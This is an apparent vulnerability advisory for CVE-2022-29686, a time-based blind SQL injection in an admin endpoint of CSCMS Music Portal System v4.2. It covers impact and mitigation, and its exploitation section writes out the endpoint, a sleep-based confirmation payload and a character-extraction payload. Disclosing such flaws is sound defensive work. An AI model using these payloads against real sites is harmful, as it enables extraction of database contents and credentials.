CVE-2022-29686

Vulnerability

A blind SQL injection vulnerability exists in singer_Lists.php_zhuan within CSCMS Music Portal System v4.2. The id parameter, passed via POST to /admin.php/singer/admin/lists/zhuan, is not properly sanitized, allowing an attacker to inject malicious SQL payloads [1]. The vulnerability is triggered when adding a singer while logged in as an administrator [1].

Exploitation

An attacker must first authenticate as an administrator and add a singer. Then, a POST request to /admin.php/singer/admin/lists/zhuan with a crafted id[] parameter (e.g., id[]=(sleep(5))) causes a measurable delay, confirming time-based blind SQL injection [1]. To extract data, the attacker can use conditional payloads such as (case(1)when(ascii(substr((select(database()))from(1)for(1)))=99)then(sleep(5))else(1)end) which compares characters of database output [1].

Impact

A successful blind SQL injection allows an authenticated administrator to retrieve sensitive information from the database, such as database names, table structures, and possibly user credentials, leading to information disclosure and potential further compromise [1].

Mitigation

As of the published references, no patch has been released for CSCMS Music Portal System v4.2 [1]. Users should restrict administrative access to trusted personnel, apply input sanitization on the id parameter, and monitor for updates from the vendor.